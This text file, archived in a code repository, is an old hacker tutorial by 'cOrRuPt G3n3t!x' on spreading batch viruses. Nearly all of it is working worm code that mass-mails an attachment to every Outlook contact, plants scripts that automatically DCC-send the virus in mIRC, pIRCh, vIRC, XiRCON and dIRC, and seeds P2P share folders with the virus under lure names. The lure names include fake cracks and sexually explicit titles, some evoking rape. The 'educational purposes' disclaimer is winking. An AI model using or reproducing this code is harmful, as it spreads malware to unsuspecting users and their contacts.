informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/uploads/batchirc.txt

281 lines
14 KiB
Plaintext
Raw Permalink Normal View History

Initial commit
2021-04-15 11:31:59 -07:00
TUTORIAL:
Batch IRC/Outlook Spreading
By
cOrRuPt G3n3t!x
Welcome back to my 3rd batch tutorial of which we shall now discuss how to spread your batch
virus over IRC (Internet Chat Relay) and MS Outlook. I have seen many different methods, but
these seem to be the best so far. I will show how to spread over mIRC, pIRCh, VIRC, dIRC,
XiRCON, KazaA, morpheus, limewire, bearshare etc... I would like to say thanks to SPTH for
some of his IRC scripts although i needed to edit some as it would not run on my system!
Please remember all these scripts are working BATCH scripts!
1)MS Outlook:
----------
MS Outlook has for many years been an excellent way of spreading virii. The actual script to spread
over MS Outlook is a VBS but we shall adapt it to be able to work in batch. See below:
-------------------------------[Cut Here]--------------------------------------
echo.on error resume next>>C:\MSO.vbs
echo.dim a,b,c,d,e>>C:\MSO.vbs
echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs
echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs
echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs
echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs
echo.set d=c.AddressLists(y)>>C:\MSO.vbs
echo.x=1 '>>C:\MSO.vbs
echo.set e=b.CreateItem(0)>>C:\MSO.vbs
echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs
echo.f=d.AddressEntries(x)>>C:\MSO.vbs
echo.e.Recipients.Add f>>C:\MSO.vbs
echo.x=x+1>>C:\MSO.vbs
echo.next>>C:\MSO.vbs
echo.e.Subject="Your Subject here">>C:\MSO.vbs
echo.e.Body="Your Body here">>C:\MSO.vbs
echo.e.Attachments.Add("c:\p2pdon.bat")>>C:\MSO.vbs
echo.e.DeleteAfterSubmit=False>>C:\MSO.vbs
echo.e.Send>>C:\MSO.vbs
echo.f ="">>C:\MSO.vbs
echo.next>>C:\MSO.vbs
call C:\MSO.vbs
Del C:\MSO.vbs
-------------------------------[Cut Here]--------------------------------------
Next to customize this script for your batch look at lines 15, 16 and 17. You will enter the subject of your e-mail
in line 15 then the main body in line 16 an finally where your virus is located in line 17.
2)mIRC:
-----
Next we will spread over mIRC a well known IRC. mIRC has a long list of possible places it could be installed too
so lets begin:
-------------------------------[Cut Here]--------------------------------------
copy %0 "%SystemDrive%\Windows\WinDef.bat"
if exist "%SystemDrive%\mirc\" goto m1
if exist "%ProgramFiles%\mirc\" goto m2
goto piRCh
:m1
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
echo.set scriptini=fso.CreateTextFile("C:\mirc\script.ini")>>C:\mscript.vbs
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
echo.scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }">>C:\mscript.vbs
echo.scriptini.WriteLine "n2= /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
echo.scriptini.close>>C:\mscript.vbs
call C:\mscript.vbs
del C:\mscript.vbs
goto pIRCh
:m2
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
echo.set scriptini=fso.CreateTextFile("C:\Program Files\mirc\script.ini")>>C:\mscript.vbs
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
echo.scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }">>C:\mscript.vbs
echo.scriptini.WriteLine "n2= /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
echo.scriptini.close>>C:\mscript.vbs
call C:\mscript.vbs
del C:\mscript.vbs
:pIrCh
-------------------------------[Cut Here]-------------------------------------------
Now this is working script for mIRC, all you need to change is the GOTO prameters, according
to what you want mIRC to goto which are lines 3 and 15, next you will have to also change where
your virus is allocated lines 1, 10 and 22 near the end of the statement! All this will
do is make the script in C:\ directory, call it and then delete it.
3)pIRCh:
-------
Another well known IRC which we shall spread through. See below for the working batch script:
-------------------------------[Cut Here]--------------------------------------------
If not exist "C:\Pirch98\" goto kazaA
if exist "%SystemDrive%\Pirch98\" goto p_inf
:p_inf
copy %0 "%SystemDrive%\Pirch98\WinDef.bat"
echo.Dim pirch>>C:\pirch.vbs
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\pirch.vbs
echo.set pirch=fso.CreateTextFile("C:\pirch98\events.ini")>>C:\pirch.vbs
echo.pirch.WriteLine "[Levels]">>C:\pirch.vbs
echo.pirch.WriteLine "Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Count=6">>C:\pirch.vbs
echo.pirch.WriteLine "Level1=000-Unknows">>C:\pirch.vbs
echo.pirch.WriteLine "000-UnknowsEnabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level2=100-Level 100">>C:\pirch.vbs
echo.pirch.WriteLine "100-Level 100Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level3=200-Level 200">>C:\pirch.vbs
echo.pirch.WriteLine "200-Level 200Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level4=300-Level 300">>C:\pirch.vbs
echo.pirch.WriteLine "300-Level 300Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level5=400-Level 400">>C:\pirch.vbs
echo.pirch.WriteLine "400-Level 400Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level6=500-Level 500">>C:\pirch.vbs
echo.pirch.WriteLine "500-Level 500Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "[000-Unknowns]">>C:\pirch.vbs
echo.pirch.WriteLine "User1=*!*@*">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=1">>C:\pirch.vbs
echo.pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\Windef.bat">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=1">>C:\pirch.vbs
echo.pirch.WriteLine "[100-Level 100]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[200-Level 200]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[300-Level 300]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[400-Level 400]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[500-Level 500]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.Close>>C:\pirch.vbs
call C:\pirch.vbs
del C:\pirch.vbs
:kazaA
-------------------------------[Cut Here]-------------------------------------------------------
There is the full script, once again, GOTO parameters need to be changed accordingly(lines 1 and last line)
than also lines 4 and 26 need to be changed according to where your virus is.
4)KazaA:
------
Another IRC, pretty simple see below:
-------------------------------[Cut Here]--------------------------------------------------------
if exist "%SystemDrive%\Kazaa\" goto vIRC
if exist "%SystemDrive%\Kazaa\" goto kazaa_inf
:kazaa_inf
copy %0 "%SystemDrive%\Kazaa\"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\k.vbs
echo.set shell=CreateObject("WScript.Shell")>>C:\k.vbs
echo.shell.RegWrite "HKLM\Software\KaZaA\Transfer\DlDir0", "C:\Kazaa\">>C:\k.vbs
call C:\k.vbs
del C:\k.vbs
:vIRC
-------------------------------[Cut Here]---------------------------------------------------------
Just make sure you copy your virus into the directory 'C:\Kazaa'!!! By now im sure
you've got the hang of changing Parameters! so go ahead you can do it :)
5)vIRC:
-----
We now see a similar script as above for vIRC just put it under your infection routine and
change the paths etc to your batchs':
-------------------------------[Cut Here]----------------------------------------------------------
if exist "%SystemDrive%\Virc\" goto v_inf
if not exist "%SystemDrive%\Virc\" goto XiRCON
:v_inf
copy %0 "%SystemDrive%\Virc\WinDef.bat"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\v.vbs
echo.set shell=CreateObject("WScript.Shell")>>C:\v.vbs
echo.shell.RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\WinDef.bat">>C:\v.vbs
call C:\v.vbs
del C:\v.vbs
:XiRCON
-------------------------------[Cut Here]----------------------------------------------------------
6)XiRCON:
-------
This is a IRC spreading technique for XiRCON just change paths and names for your batch(Thanks to SPTH):
-------------------------------[Cut Here]----------------------------------------------------------
IF EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" goto inf_xircon
IF NOT EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" GOTO dIRC
:inf_xircon
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\xi.vbs
echo.set xi=fso.CreateTextFile("C:\Default.tcl")>>C:\xi.vbs
echo.xi.writeline " on ctcp {">>C:\xi.vbs
echo.xi.writeline " foreach n [channels] {">>C:\xi.vbs
echo.xi.writeline " if {$n != [my_nick]} {">>C:\xi.vbs
echo.xi.writeline " /dcc send $n C:\Windows\WinDef.bat">>C:\xi.vbs
echo.xi.writeline " }">>C:\xi.vbs
echo.xi.writeline " }">>C:\xi.vbs
echo.xi.writeline "}">>C:\xi.vbs
copy %0 "%SystemDrive%\Virc\WinDef.bat"
del /f /q "%SystemDrive%\Program Files\XiRCON\Default.tcl"
call C:\xi.vbs
del C:\xi.vbs
copy "C:\Default.tcl" "%SystemDrive%\Program Files\XiRCON\Default.tcl"
:dIRC
-------------------------------[Cut Here]------------------------------------------------------------
7)dIRC:
------
There are a bit more options on this script, you can either add your new script to the existing one
or make a whole new one entirely, SPTH decided to make a new one so let us go with his advice
as above just change paths and goto parameter as needed by your batch:
-------------------------------[Cut Here]-------------------------------------------------------------
if exist "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" goto inf_dirc >nul
if exist not "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" goto randomspread
:inf_dirc
copy %0 "%SystemDrive%\Windows\WinDef.bat"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\dirc.vbs
echo.set dirc=fso.CreateTextFile("C:\virus.dsf")>>C:\dirc.vbs
echo.dirc.writeline "#commands">>C:\dirc.vbs
echo.dirc.writeline "#VBScript">>C:\dirc.vbs
echo.dirc.writeline "!!! Do not edit the contents of this file. !!!">>C:\dirc.vbs
echo.dirc.writeline "">>C:\dirc.vbs
echo.dirc.writeline "#EVENT# vir Join * * on">>C:\dirc.vbs
echo.dirc.writeline "sendcommand /dcc send & Nick & C:\Windows\WinDef.bat">>C:\dirc.vbs
echo.dirc.writeline "===">>C:\dirc.vbs
call C:\dirc.vbs
del C:\dirc.vbs
copy "C:\virus.dsf" "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" >nul
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\standard.dsf commands VBScript>>scripts.drc
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\virus.dsf commands VBScript>>scripts.drc
:randomspread
-------------------------------[Cut Here]-------------------------------------------------------------
8)Random Share Spread (RSS):
-------------------------
This is just random spreading through a multitude of different shareware sites:
just add to the spread routine in your code:
-------------------------------[Cut Here]-------------------------------------------------------------
:randomspread:
COPY %0 "%SystemDrive%\mydocu~1\Crysis_keygen.bat" >nul
COPY %0 "%SystemDrive%\mydocu~1\Kaspersky_Antivirus_10_Limited_Edition.url.bat" >nul
COPY %0 "%SystemDrive%\kazaa\myshar~1\FHM_2009_MODELS.jpg.bat" >nul
COPY %0 "%ProgramFiles%\applej~1\incoming\Windows_Vista_Crack.bat" >nul
COPY %0 "%ProgramFiles%\bearsh~1\shared\XXX_SITE_PASSWORDS.bat" >nul
COPY %0 "%ProgramFiles%\eDonkey2000\incoming\Teen_Forced_To_Suck.wmv.bat" >nul
COPY %0 "%ProgramFiles%\emule\incoming\Windows7_RC1_Downloader.bat" >nul
COPY %0 "%ProgramFiles%\grokster\mygrok~1\ICE_AGE_3.wmv.bat" >nul
COPY %0 "%ProgramFiles%\icq\shared~1\Norton_AV_2009_CRACKED.exe.bat" >nul
COPY %0 "%ProgramFiles%\kazaa\myshar~1\EBONY_WHORE_RAPED.mp4.bat" >nul
COPY %0 "%ProgramFiles%\kazaal~1\myshar~1\VisualC_Keygen_2009.bat" >nul
COPY %0 "%ProgramFiles%\kmd\myshar~1\EXPLOITED_ASIANS.wmv.bat" >nul
COPY %0 "%ProgramFiles%\limewire\shared\ASS_LICKERS.MOV.bat" >nul
COPY %0 "%ProgramFiles%\morpheus\myshar~1\Hard_Russian_rape.wmv.bat" >nul
COPY %0 "%ProgramFiles%\overnet\bundles\Virgins_1st_fuck.mp4.bat" >nul
exit
-------------------------------[Cut Here]-------------------------------------------------------------
I have been writing this tutorial for well over 2 hours now, so it's time for me to go, If you have any bugs or queries e-mail them to me at
and i'll do my best to help. Remember this is for educational purpose only! ;) Let me jus batch off!! This is Corrupt Genetix signing out.
REMEMBER THIS IS FOR EDUCATIONAL PURPOSES ONLY!!